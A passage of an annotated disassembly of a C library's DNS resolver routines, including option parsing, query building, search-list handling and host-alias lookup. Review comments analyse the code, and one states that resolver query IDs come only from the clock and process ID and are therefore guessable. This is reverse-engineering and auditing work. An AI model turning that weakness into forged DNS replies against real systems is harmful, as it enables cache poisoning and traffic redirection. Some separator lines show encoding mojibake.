byte_80785A4 mov dword_807858C, 0 loc_804DE32: ; CODE XREF: res_init+6D8j push offset aRes_options ; "RES_OPTIONS" call secure_getenv mov ebx, eax add esp, 4 test ebx, ebx jz short loc_804DE50 push offset aEnv ; "env" push ebx call res_setoptions loc_804DE50: ; CODE XREF: res_init+6FFj or byte ptr dword_807854C, 1 xor eax, eax lea esp, [ebp+var_430] pop ebx pop esi pop edi mov esp, ebp pop ebp retn res_init endp ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 栩栩栩栩栩栩栩 S U B R O U T I N E 栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩 ; Attributes: bp-based frame hidden res_setoptions proc near ; CODE XREF: res_init+644p ; res_init+707p var_C = byte ptr -0Ch arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp push edi push esi push ebx mov edi, [ebp+arg_0] mov esi, [ebp+arg_4] mov ebx, edi test byte ptr dword_807854C, 2 jz loc_804DF60 push esi push ebx push offset aRes_setoptions ; ";; res_setoptions(\"%s\", \"%s\")...\n" call printf add esp, 0Ch jmp loc_804DF60 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_804DE98: ; CODE XREF: 
res_setoptions+34j ; res_setoptions+39j inc ebx loc_804DE99: ; CODE XREF: res_setoptions+FBj cmp byte ptr [ebx], 20h jz short loc_804DE98 cmp byte ptr [ebx], 9 jz short loc_804DE98 push 6 push offset aNdots ; "ndots:" push ebx call strncmp add esp, 0Ch test eax, eax jnz short loc_804DF0C lea eax, [ebx+6] push 0 push 0Ah push 0 push eax call sub_8056064 add esp, 10h cmp eax, 0Fh jg short loc_804DEE0 and al, 0Fh and byte_80786A8, 0F0h or byte_80786A8, al jmp short loc_804DEE7 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_804DEE0: ; CODE XREF: res_setoptions+64j or byte_80786A8, 0Fh loc_804DEE7: ; CODE XREF: res_setoptions+75j test byte ptr dword_807854C, 2 jz short loc_804DF56 mov al, byte_80786A8 and eax, 0Fh push eax push offset aNdotsD ; ";;\tndots=%d\n" call printf add esp, 8 jmp short loc_804DF56 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804DF0C: ; CODE XREF: res_setoptions+4Dj push 5 push offset aDebug ; "debug" push ebx call strncmp add esp, 0Ch test eax, eax jnz short loc_804DF56 test byte ptr dword_807854C, 2 jnz short loc_804DF3F push esi push edi push offset aRes_setoptio_0 ; ";; res_setoptions(\"%s\", \"%s\")..\n" call printf or byte ptr dword_807854C, 2 add esp, 0Ch loc_804DF3F: ; CODE XREF: res_setoptions+BFj push offset aDebug_0 ; ";;\tdebug\n" call printf add esp, 4 jmp short loc_804DF56 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804DF50: ; CODE XREF: res_setoptions+F6j cmp byte ptr [ebx], 9 jz short loc_804DF60 inc ebx loc_804DF56: ; CODE XREF: res_setoptions+86j ; res_setoptions+9Fj ... cmp byte ptr [ebx], 0 jz short loc_804DF69 cmp byte ptr [ebx], 20h jnz short loc_804DF50 loc_804DF60: ; CODE XREF: res_setoptions+15j ; res_setoptions+2Aj ... 
; Tail of res_setoptions (started before this span): keep scanning while the
; option string at ebx has characters left, then restore registers and return.
        cmp byte ptr [ebx], 0
        jnz loc_804DE99
loc_804DF69:                            ; CODE XREF: res_setoptions+F1j
        lea esp, [ebp+var_C]
        pop ebx
        pop esi
        pop edi
        mov esp, ebp
        pop ebp
        retn
res_setoptions endp
; ---------------------------------------------------------------------------
        align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
; net_mask: derives a classful netmask from the IPv4 address in arg_0.
; The address is byte-swapped first (xchg / ror 16 / xchg), so the test is
; made on the first address octet in the top byte:
;   top bit 0          -> returns 0FFh
;   top two bits 10    -> returns 0FFFFh
;   anything else      -> returns 0FFFFFFh
; NOTE(review): the returned constants read as 255.0.0.0 / 255.255.0.0 /
; 255.255.255.0 when stored little-endian, i.e. masks in network byte order
; -- confirm against the caller in the sortlist parser.
net_mask proc near                      ; CODE XREF: res_init+5D7p
arg_0 = dword ptr 8
        push ebp
        mov ebp, esp
        mov eax, [ebp+arg_0]
        xchg al, ah                     ; these three instructions reverse the four bytes
        ror eax, 10h
        xchg al, ah
        test eax, eax
        jl short loc_804DF90            ; top bit set -> not the first class
        mov eax, 0FFh
        mov esp, ebp
        pop ebp
        retn
; ---------------------------------------------------------------------------
        db 8Dh, 36h
; ---------------------------------------------------------------------------
loc_804DF90:                            ; CODE XREF: net_mask+Fj
        and eax, 0C0000000h
        cmp eax, 80000000h
        jz short loc_804DFA8            ; top bits 10
        mov eax, 0FFFFFFh
        mov esp, ebp
        pop ebp
        retn
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0
; ---------------------------------------------------------------------------
loc_804DFA8:                            ; CODE XREF: net_mask+26j
        mov eax, 0FFFFh
        mov esp, ebp
        pop ebp
        retn
net_mask endp
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
; res_randomid: returns a 16-bit value built as
;     low16(word at var_8) XOR low16(word at var_4) XOR low16(getpid())
; where var_8 is the 8-byte buffer filled by gettimeofday(&buf, 0), so the
; two words are the low halves of its two dword fields (seconds and
; microseconds, assuming the usual struct timeval layout).
; The clock and the PID are the only inputs; no other source of randomness is
; mixed in. res_init stores the result as the resolver's initial id, so
; identifiers produced from it should be treated as guessable when assessing
; how well this resolver resists forged replies.
res_randomid proc near                  ; CODE XREF: res_init+77p
var_8 = word ptr -8
var_4 = word ptr -4
        push ebp
        mov ebp, esp
        sub esp, 8
        push 0                          ; second argument (timezone) = NULL
        lea eax, [ebp+var_8]
        push eax
        call gettimeofday               ; return value is not checked
        call getpid
        mov edx, eax
        mov ax, [ebp+var_8]
        xor ax, [ebp+var_4]
        xor ax, dx
        and eax, 0FFFFh
        mov esp, ebp                    ; also discards the two pushed arguments
        pop ebp
        retn
res_randomid endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
; sub_804DFE0: the debug strings in its body name it res_query.
sub_804DFE0 proc near                   ; CODE XREF: gethostbyaddr+CAp
                                        ; res_search+A7p ...
; Body of sub_804DFE0 (its "proc near" line precedes this span). The debug
; format strings identify it as the resolver's res_query.
;
; Arguments as used below:
;   arg_0  - printed with %s and passed to the query builder (the name)
;   arg_4, arg_8 - printed with %d, %d and passed to the query builder
;            (presumably class and type)
;   arg_C  - caller's answer buffer; byte 3 low nibble is read as the reply
;            code and the 16-bit field at offset 6 as the answer count
;   arg_10 - passed through to the send routine (presumably the answer
;            buffer length)
; Flow: initialise the resolver if bit 0 of dword_807854C is clear, build a
; query into a 400h-byte stack buffer (sub_80608C8), send it (sub_804EA0C),
; then translate a failed or empty reply into a code in dword_807E788 and
; return -1. On success the send routine's return value is returned.
; NOTE(review): sub_80608C8 / sub_804EA0C are presumably res_mkquery /
; res_send, and dword_807E788 h_errno -- confirm.
var_40C = byte ptr -40Ch
var_400 = byte ptr -400h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
        push ebp
        mov ebp, esp
        sub esp, 400h
        push edi
        push esi
        push ebx
        mov edi, [ebp+arg_4]
        mov ebx, [ebp+arg_8]
        mov esi, [ebp+arg_C]            ; esi = answer buffer for the rest of the routine
        and byte ptr [esi+3], 0F0h      ; clear the reply-code nibble before sending
        test byte ptr dword_807854C, 1
        jnz short loc_804E020           ; already initialised
        call res_init
        cmp eax, 0FFFFFFFFh
        jnz short loc_804E020
        mov ds:dword_807E788, 0FFFFFFFFh
loc_804E016:                            ; CODE XREF: sub_804DFE0+15Aj
                                        ; sub_804DFE0+16Aj ...
        mov eax, 0FFFFFFFFh             ; common failure return
        jmp loc_804E172
; ---------------------------------------------------------------------------
loc_804E020:                            ; CODE XREF: sub_804DFE0+20j
                                        ; sub_804DFE0+2Aj
        test byte ptr dword_807854C, 2  ; bit 1 gates every debug printf in this routine
        jz short loc_804E03C
        push ebx
        push edi
        mov edx, [ebp+arg_0]
        push edx
        push offset aRes_querySDD       ; ";; res_query(%s, %d, %d)\n"
        call printf
        add esp, 10h
loc_804E03C:                            ; CODE XREF: sub_804DFE0+47j
        push 400h                       ; size of the local query buffer
        lea eax, [ebp+var_400]
        push eax                        ; local query buffer
        push 0
        push 0
        push 0
        push ebx                        ; arg_8
        push edi                        ; arg_4
        mov edx, [ebp+arg_0]
        push edx                        ; name
        push 0
        call sub_80608C8                ; build the query; returns its length
        mov ebx, eax
        add esp, 24h
        test ebx, ebx
        jg short loc_804E088
        test byte ptr dword_807854C, 2
        jz short loc_804E077
        push offset aRes_queryMkque     ; ";; res_query: mkquery failed\n"
        call printf
loc_804E077:                            ; CODE XREF: sub_804DFE0+8Bj
        mov ds:dword_807E788, 3         ; query could not be built
        jmp loc_804E170                 ; returns ebx (<= 0) to the caller
; ---------------------------------------------------------------------------
        db 8Dh, 36h
; ---------------------------------------------------------------------------
loc_804E088:                            ; CODE XREF: sub_804DFE0+82j
        mov edx, [ebp+arg_10]
        push edx
        mov edx, [ebp+arg_C]
        push edx                        ; answer buffer
        push ebx                        ; query length
        lea eax, [ebp+var_400]
        push eax                        ; query
        call sub_804EA0C                ; send and wait for the reply
        mov ebx, eax
        add esp, 10h
        test ebx, ebx
        jge short loc_804E0C8
        test byte ptr dword_807854C, 2
        jz short loc_804E0B9
        push offset aRes_querySendE     ; ";; res_query: send error\n"
        call printf
loc_804E0B9:                            ; CODE XREF: sub_804DFE0+CDj
        mov ds:dword_807E788, 2         ; transport failure
        jmp loc_804E170
; ---------------------------------------------------------------------------
loc_804E0C8:                            ; CODE XREF: sub_804DFE0+C4j
        test byte ptr [esi+3], 0Fh      ; reply code != 0 ?
        jnz short loc_804E0DD
        mov ax, [esi+6]
        xchg al, ah                     ; answer count, network -> host order
        test ax, ax
        jnz loc_804E170                 ; code 0 and at least one answer: success
loc_804E0DD:                            ; CODE XREF: sub_804DFE0+ECj
        test byte ptr dword_807854C, 2
        jz short loc_804E103
        mov ax, [esi+6]
        xchg al, ah
        and eax, 0FFFFh
        push eax
        mov al, [esi+3]
        and eax, 0Fh
        push eax
        push offset aRcodeDAncountD     ; ";; rcode = %d, ancount=%d\n"
        call printf
        ; Map the reply code to the value left in dword_807E788:
        ;   0 -> 4, 2 -> 2, 3 -> 1, everything else (1, 4, 5, 6..15) -> 3.
        ; NOTE(review): with the standard DNS rcodes and netdb.h values this
        ; reads NOERROR->NO_DATA, SERVFAIL->TRY_AGAIN,
        ; NXDOMAIN->HOST_NOT_FOUND, other->NO_RECOVERY -- confirm.
loc_804E103:                            ; CODE XREF: sub_804DFE0+104j
        mov al, [esi+3]
        and eax, 0Fh
        cmp eax, 5                      ; switch 6 cases
        ja short loc_804E160            ; default
        jmp ds:off_804E118[eax*4]       ; switch jump
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0
off_804E118 dd offset loc_804E150, offset loc_804E160, offset loc_804E140 ; DATA XREF: sub_804DFE0+12Er
        dd offset loc_804E130, 2 dup(offset loc_804E160) ; jump table for switch statement
; ---------------------------------------------------------------------------
loc_804E130:                            ; CODE XREF: sub_804DFE0+12Ej
                                        ; DATA XREF: sub_804DFE0+138o
        mov ds:dword_807E788, 1         ; case 0x3
        jmp loc_804E016
; ---------------------------------------------------------------------------
        align 4
loc_804E140:                            ; CODE XREF: sub_804DFE0+12Ej
                                        ; DATA XREF: sub_804DFE0+138o
        mov ds:dword_807E788, 2         ; case 0x2
        jmp loc_804E016
; ---------------------------------------------------------------------------
        align 4
loc_804E150:                            ; CODE XREF: sub_804DFE0+12Ej
                                        ; DATA XREF: sub_804DFE0+138o
        mov ds:dword_807E788, 4         ; case 0x0
        jmp loc_804E016
; ---------------------------------------------------------------------------
        align 4
loc_804E160:                            ; CODE XREF: sub_804DFE0+12Cj
                                        ; sub_804DFE0+12Ej
                                        ; DATA XREF: ...
        mov ds:dword_807E788, 3         ; default
        jmp loc_804E016
; ---------------------------------------------------------------------------
        align 4
loc_804E170:                            ; CODE XREF: sub_804DFE0+A1j
                                        ; sub_804DFE0+E3j ...
; Tail of sub_804DFE0 (started before this span): return the length held in
; ebx, or the -1 already placed in eax by the failure path.
        mov eax, ebx
loc_804E172:                            ; CODE XREF: sub_804DFE0+3Bj
        lea esp, [ebp+var_40C]
        pop ebx
        pop esi
        pop edi
        mov esp, ebp
        pop ebp
        retn
sub_804DFE0 endp
; ---------------------------------------------------------------------------
        align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
; res_search: resolves the name in arg_0, trying it as given and/or with each
; entry of the search list at dword_8078588 appended. arg_4, arg_8, arg_C and
; arg_10 are forwarded unchanged to the per-attempt helper; arg_C is also
; read as the answer buffer (reply code in byte 3).
; Returns the first positive result from sub_804DFE0 / sub_804E398, or -1
; with a status left in dword_807E788.
;
; Order of attempts, as coded:
;   1. name has no dot and sub_804E490(name) is non-NULL -> query that
;      string directly and return whatever sub_804DFE0 returns;
;   2. dot count >= low nibble of byte_80786A8 -> try the name as-is first;
;   3. search list, when (no dots and option bit 80h) or (dots, no trailing
;      dot and option bit 200h);
;   4. name as-is, if step 2 did not already do it.
; NOTE(review): sub_804E490 is presumably hostalias, sub_804E398
; res_querydomain, the nibble "ndots", bits 80h/200h RES_DEFNAMES /
; RES_DNSRCH, and dword_807E788 h_errno -- confirm.
res_search proc near                    ; CODE XREF: gethostbyname+144p
var_20 = byte ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
        push ebp
        mov ebp, esp
        sub esp, 14h
        push edi
        push esi
        push ebx
        mov edi, [ebp+arg_0]            ; edi = name
        mov edx, [ebp+arg_C]
        mov [ebp+var_4], edx            ; var_4 = answer buffer
        mov [ebp+var_C], 0              ; count of attempts that ended with status 4
        mov [ebp+var_10], 0             ; count of status-2 attempts with reply code 2
        mov [ebp+var_14], 0             ; set once the name was tried as-is
        test byte ptr dword_807854C, 1
        jnz short loc_804E1CC
        call res_init
        cmp eax, 0FFFFFFFFh
        jnz short loc_804E1CC
        mov ds:dword_807E788, 0FFFFFFFFh
        jmp loc_804E388
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0
; ---------------------------------------------------------------------------
loc_804E1CC:                            ; CODE XREF: res_search+2Ej
                                        ; res_search+38j
        mov __errno, 0
        mov ds:dword_807E788, 1         ; default status
        xor ebx, ebx                    ; ebx = number of '.' in the name
        mov eax, edi
        cmp byte ptr [edi], 0
        jz short loc_804E1F8
        db 8Dh,76h,0 ; lea esi, [esi+0]
loc_804E1EC:                            ; CODE XREF: res_search+76j
        cmp byte ptr [eax], 2Eh
        jnz short loc_804E1F2
        inc ebx
loc_804E1F2:                            ; CODE XREF: res_search+6Fj
        inc eax
        cmp byte ptr [eax], 0
        jnz short loc_804E1EC
loc_804E1F8:                            ; CODE XREF: res_search+67j
        xor esi, esi                    ; esi = 1 when the name ends in '.'
        cmp eax, edi
        jbe short loc_804E205           ; empty name: do not look at [eax-1]
        cmp byte ptr [eax-1], 2Eh
        jnz short loc_804E205
        inc esi
loc_804E205:                            ; CODE XREF: res_search+7Cj
                                        ; res_search+82j
        test ebx, ebx
        jnz short loc_804E234
        push edi
        call sub_804E490                ; dot-less name: look for a replacement string
        add esp, 4
        test eax, eax
        jz short loc_804E234
        mov edx, [ebp+arg_10]
        push edx
        mov edx, [ebp+arg_C]
        push edx
        mov edx, [ebp+arg_8]
        push edx
        mov edx, [ebp+arg_4]
        push edx
        push eax                        ; query the replacement instead of the name
        call sub_804DFE0
        jmp loc_804E38D
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0
; ---------------------------------------------------------------------------
loc_804E234:                            ; CODE XREF: res_search+87j
                                        ; res_search+94j
        mov [ebp+var_8], 0FFFFFFFFh     ; var_8 = status saved from the as-is attempt (-1 = none)
        mov al, byte_80786A8
        and eax, 0Fh                    ; threshold = low nibble
        cmp ebx, eax
        jb short loc_804E277            ; fewer dots than the threshold: search list first
        mov edx, [ebp+arg_10]
        push edx
        mov edx, [ebp+arg_C]
        push edx
        mov edx, [ebp+arg_8]
        push edx
        mov edx, [ebp+arg_4]
        push edx
        push 0                          ; no domain appended
        push edi
        call sub_804E398
        add esp, 18h
        test eax, eax
        jg loc_804E38D                  ; got an answer
        mov edx, ds:dword_807E788
        mov [ebp+var_8], edx            ; keep this failure status for the final report
        inc [ebp+var_14]
loc_804E277:                            ; CODE XREF: res_search+C6j
        test ebx, ebx
        jnz short loc_804E28C
        cmp byte ptr dword_807854C, 0
        jl short loc_804E2A1            ; no dots and option bit 80h set: use the search list
        jmp loc_804E32F
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0
; ---------------------------------------------------------------------------
loc_804E28C:                            ; CODE XREF: res_search+F9j
        test esi, esi
        jnz loc_804E32F                 ; trailing dot: never append search domains
        test byte ptr dword_807854C+1, 2 ; option bit 200h
        jz loc_804E32F
loc_804E2A1:                            ; CODE XREF: res_search+102j
        xor ebx, ebx                    ; ebx is reused as the "stop searching" flag
        mov esi, offset dword_8078588   ; esi walks the NULL-terminated search list
        cmp dword_8078588, 0
        jz short loc_804E32F
        db 8Dh,76h,0 ; lea esi, [esi+0]
loc_804E2B4:                            ; CODE XREF: res_search+1ADj
        mov edx, [ebp+arg_10]
        push edx
        mov edx, [ebp+arg_C]
        push edx
        mov edx, [ebp+arg_8]
        push edx
        mov edx, [ebp+arg_4]
        push edx
        mov eax, [esi]
        push eax                        ; current search domain
        push edi
        call sub_804E398
        add esp, 18h
        test eax, eax
        jg loc_804E38D
        cmp __errno, 6Fh                ; 111; presumably ECONNREFUSED on Linux/i386
        jz loc_804E37E                  ; give up at once with status 2
        mov eax, ds:dword_807E788
        cmp eax, 2
        jz short loc_804E304
        jg short loc_804E2F8
        cmp eax, 1
        jz short loc_804E319            ; status 1: just try the next domain
        jmp short loc_804E318
; ---------------------------------------------------------------------------
loc_804E2F8:                            ; CODE XREF: res_search+16Fj
        cmp eax, 4
        jnz short loc_804E318
        inc [ebp+var_C]                 ; status 4: note it, keep searching
        jmp short loc_804E319
; ---------------------------------------------------------------------------
        db 8Dh, 36h
; ---------------------------------------------------------------------------
loc_804E304:                            ; CODE XREF: res_search+16Dj
        mov edx, [ebp+var_4]
        mov al, [edx+3]
        and al, 0Fh
        cmp al, 2                       ; status 2 is only retried when the reply code is 2
        jnz short loc_804E318
        inc [ebp+var_10]
        jmp short loc_804E319
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0
; ---------------------------------------------------------------------------
loc_804E318:                            ; CODE XREF: res_search+176j
                                        ; res_search+17Bj ...
        inc ebx                         ; any other outcome ends the search
loc_804E319:                            ; CODE XREF: res_search+174j
                                        ; res_search+180j ...
        test byte ptr dword_807854C+1, 2
        jnz short loc_804E323
        inc ebx                         ; option bit 200h clear: only the first entry is tried
loc_804E323:                            ; CODE XREF: res_search+1A0j
        add esi, 4
        cmp dword ptr [esi], 0
        jz short loc_804E32F
        test ebx, ebx
        jz short loc_804E2B4
loc_804E32F:                            ; CODE XREF: res_search+104j
                                        ; res_search+10Ej ...
        cmp [ebp+var_14], 0
        jnz short loc_804E351           ; as-is attempt already made
        mov edx, [ebp+arg_10]
        push edx
        mov edx, [ebp+arg_C]
        push edx
        mov edx, [ebp+arg_8]
        push edx
        mov edx, [ebp+arg_4]
        push edx
        push 0
        push edi
        call sub_804E398                ; last resort: the name exactly as given
        test eax, eax
        jg short loc_804E38D
        ; Choose the status to report: the saved as-is status if there was
        ; one, else 4 if any attempt ended with 4, else 2 if any attempt hit
        ; the reply-code-2 case, else whatever dword_807E788 already holds.
loc_804E351:                            ; CODE XREF: res_search+1B3j
        cmp [ebp+var_8], 0FFFFFFFFh
        jz short loc_804E364
        mov edx, [ebp+var_8]
        mov ds:dword_807E788, edx
        jmp short loc_804E388
; ---------------------------------------------------------------------------
        db 8Dh, 36h
; ---------------------------------------------------------------------------
loc_804E364:                            ; CODE XREF: res_search+1D5j
        cmp [ebp+var_C], 0
        jz short loc_804E378
        mov ds:dword_807E788, 4
        jmp short loc_804E388
; ---------------------------------------------------------------------------
        db 8Dh, 36h
; ---------------------------------------------------------------------------
loc_804E378:                            ; CODE XREF: res_search+1E8j
        cmp [ebp+var_10], 0
        jz short loc_804E388
loc_804E37E:                            ; CODE XREF: res_search+15Fj
        mov ds:dword_807E788, 2
loc_804E388:                            ; CODE XREF: res_search+44j
                                        ; res_search+1E0j ...
        mov eax, 0FFFFFFFFh
loc_804E38D:                            ; CODE XREF: res_search+ACj
                                        ; res_search+E5j ...
        lea esp, [ebp+var_20]           ; also drops arguments left on the stack by the last call
        pop ebx
        pop esi
        pop edi
        mov esp, ebp
        pop ebp
        retn
res_search endp
; ---------------------------------------------------------------------------
        align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
; sub_804E398: the debug string in its body names it res_querydomain.
sub_804E398 proc near                   ; CODE XREF: res_search+DBp
                                        ; res_search+148p ...
; Body of sub_804E398 (its "proc near" line immediately precedes this point).
; The debug format string used below reads ";; res_querydomain(...)", so this
; is presumably the resolver's res_querydomain: build "name.domain" in a stack
; buffer and hand it to sub_804DFE0.
;   arg_0 name, arg_4 domain (may be NULL), arg_8..arg_14 passed through.
;   var_204 is a 204h-byte stack buffer; both ways of filling it are bounded:
;   the copy path requires length <= 200h, and the sprintf path limits each
;   "%.*s" to 100h characters (100h + '.' + 100h + NUL = 202h bytes).
var_210 = byte ptr -210h
var_204 = byte ptr -204h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
        push ebp
        mov ebp, esp
        sub esp, 204h
        push edi
        push esi
        push ebx
        mov ebx, [ebp+arg_0]
        mov edi, [ebp+arg_4]
        lea esi, [ebp+var_204] ; esi = name to query; defaults to the buffer
        test byte ptr dword_807854C, 1
        jnz short loc_804E3D8
        call res_init
        cmp eax, 0FFFFFFFFh
        jnz short loc_804E3D8
        mov ds:dword_807E788, 0FFFFFFFFh
        mov eax, 0FFFFFFFFh
        jmp loc_804E482
; ---------------------------------------------------------------------------
        align 4
loc_804E3D8: ; CODE XREF: sub_804E398+1Fj
             ; sub_804E398+29j
        ; Debug trace, only when bit 2 of dword_807854C is set.
        test byte ptr dword_807854C, 2
        jz short loc_804E403
        mov edx, [ebp+arg_C]
        push edx
        mov edx, [ebp+arg_8]
        push edx
        mov eax, edi
        test edi, edi
        jnz short loc_804E3F4
        mov eax, offset aNil ; ""
loc_804E3F4: ; CODE XREF: sub_804E398+55j
        push eax
        push ebx
        push offset aRes_querydomai ; ";; res_querydomain(%s, %s, %d, %d)\n"
        call printf
        add esp, 14h
loc_804E403: ; CODE XREF: sub_804E398+47j
        test edi, edi
        jnz short loc_804E44C
        ; domain == NULL: inline strlen(name); edi = length - 1.
        xor al, al
        mov edi, ebx
        cld
        mov ecx, 0FFFFFFFFh
        repne scasb
        mov eax, ecx
        not eax
        lea edi, [eax-2]
        ; Strip one trailing '.' by copying into the buffer, but only when the
        ; name is non-empty, ends in '.', and the index is <= 200h so the
        ; terminator written below stays inside var_204.
        cmp edi, 0FFFFFFFFh
        jz short loc_804E448
        cmp byte ptr [edi+ebx], 2Eh
        jnz short loc_804E448
        cmp edi, 200h
        ja short loc_804E448
        push edi
        lea eax, [ebp+var_204]
        push eax
        push ebx
        call bcopy
        mov byte ptr [edi+ebp-204h], 0
        add esp, 0Ch
        jmp short loc_804E46C
; ---------------------------------------------------------------------------
loc_804E448: ; CODE XREF: sub_804E398+85j
             ; sub_804E398+8Bj ...
        mov esi, ebx ; query the caller's name unchanged
        jmp short loc_804E46C
; ---------------------------------------------------------------------------
loc_804E44C: ; CODE XREF: sub_804E398+6Dj
        ; sprintf(var_204, "%.*s.%.*s", 100h, name, 100h, domain)
        push edi
        push 100h
        push ebx
        push 100h
        push offset a_S__S ; "%.*s.%.*s"
        lea eax, [ebp+var_204]
        push eax
        call sprintf
        add esp, 18h
loc_804E46C: ; CODE XREF: sub_804E398+AEj
             ; sub_804E398+B2j
        mov edx, [ebp+arg_14]
        push edx
        mov edx, [ebp+arg_10]
        push edx
        mov edx, [ebp+arg_C]
        push edx
        mov edx, [ebp+arg_8]
        push edx
        push esi
        call sub_804DFE0
loc_804E482: ; CODE XREF: sub_804E398+3Aj
        lea esp, [ebp+var_210]
        pop ebx
        pop esi
        pop edi
        mov esp, ebp
        pop ebp
        retn
sub_804E398 endp
; ---------------------------------------------------------------------------
        align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
;
; sub_804E490 -- host alias lookup (presumably the resolver's hostalias()).
;   arg_0: name to look up.
;   Returns a pointer to the static buffer unk_807A758 holding the alias
;   target, or 0 when there is no match or the lookup is disabled.
; Behaviour visible below:
;   * skipped entirely when bit 1000h of dword_807854C is set;
;   * the file path comes from the HOSTALIASES environment variable, fetched
;     through the routine the disassembler labels secure_getenv (how that
;     routine treats privileged processes is not visible here -- confirm);
;   * each line is read with fgets into the 400h-byte stack buffer var_400,
;     so line length is bounded by the buffer;
;   * the result is copied with strncpy(..., 0FFh) after the byte at
;     byte_807A857 (unk_807A758 + 0FFh) is zeroed, so it stays terminated;
;   * the returned buffer is static, so a later call overwrites it.
; dword_8078FA0 is indexed as table[c*2+1] & 20h with a zero-extended byte,
; which looks like a ctype whitespace test (presumably isspace).
sub_804E490 proc near ; CODE XREF: res_search+8Ap
var_410 = byte ptr -410h
var_404 = dword ptr -404h
var_400 = byte ptr -400h
var_3FF = byte ptr -3FFh
var_1 = byte ptr -1
arg_0 = dword ptr 8
        push ebp
        mov ebp, esp
        sub esp, 404h
        push edi
        push esi
        push ebx
        test byte ptr dword_807854C+1, 10h
        jnz loc_804E626
        push offset aHostaliases ; "HOSTALIASES"
        call secure_getenv
        add esp, 4
        test eax, eax
        jz loc_804E626
        push offset aR_1 ; "r"
        push eax
        call fopen
        mov edi, eax ; edi = FILE* for the rest of the routine
        add esp, 8
        test edi, edi
        jz loc_804E626
        push 0
        push edi
        call sub_8054DF0 ; called as (fp, 0); presumably setbuf(fp, NULL)
        mov [ebp+var_1], 0 ; force a NUL in the last byte of the line buffer
        add esp, 8
        lea esi, [ebp+var_400]
        mov [ebp+var_404], esi
        db 8Dh,76h,0 ; lea esi, [esi+0]
loc_804E4F4: ; CODE XREF: sub_804E490+101j
        ; Per-line loop: fgets(var_400, 400h, fp)
        push edi
        push 400h
        mov esi, [ebp+var_404]
        push esi
        call fgets
        add esp, 0Ch
        test eax, eax
        jz loc_804E620
        ; Advance ebx to the first whitespace character; a line with no
        ; whitespace ends the search.
        mov ebx, [ebp+var_404]
        cmp [ebp+var_400], 0
        jz loc_804E620
        movzx eax, [ebp+var_400]
        mov edx, dword_8078FA0
        test byte ptr [edx+eax*2+1], 20h
        jnz short loc_804E570
        lea ebx, [ebp+var_3FF]
        cmp [ebp+var_3FF], 0
        jz loc_804E620
        movzx eax, [ebp+var_3FF]
        test byte ptr [edx+eax*2+1], 20h
        jnz short loc_804E570
        db 8Dh,76h,0 ; lea esi, [esi+0]
loc_804E55C: ; CODE XREF: sub_804E490+DEj
        inc ebx
        cmp byte ptr [ebx], 0
        jz loc_804E620
        movzx eax, byte ptr [ebx]
        test byte ptr [edx+eax*2+1], 20h
        jz short loc_804E55C
loc_804E570: ; CODE XREF: sub_804E490+A6j
             ; sub_804E490+C7j
        cmp byte ptr [ebx], 0
        jz loc_804E620
        ; Terminate the first field and compare it with arg_0; a non-zero
        ; result from sub_80565F8 means "no match, read the next line"
        ; (presumably a case-insensitive string compare).
        mov byte ptr [ebx], 0
        mov esi, [ebp+arg_0]
        push esi
        mov esi, [ebp+var_404]
        push esi
        call sub_80565F8
        add esp, 8
        test eax, eax
        jnz loc_804E4F4
        ; Match: skip whitespace to the start of the second field.
        inc ebx
        movzx eax, byte ptr [ebx]
        mov edx, dword_8078FA0
        test byte ptr [edx+eax*2+1], 20h
        jz short loc_804E5B3
loc_804E5A8: ; CODE XREF: sub_804E490+121j
        inc ebx
        movzx eax, byte ptr [ebx]
        test byte ptr [edx+eax*2+1], 20h
        jnz short loc_804E5A8
loc_804E5B3: ; CODE XREF: sub_804E490+116j
        cmp byte ptr [ebx], 0
        jz short loc_804E620
        ; Find the end of the second field (edx) -- the first two steps are
        ; unrolled, then the loop at loc_804E5E8 continues.
        lea edx, [ebx+1]
        cmp byte ptr [ebx+1], 0
        jz short loc_804E5F8
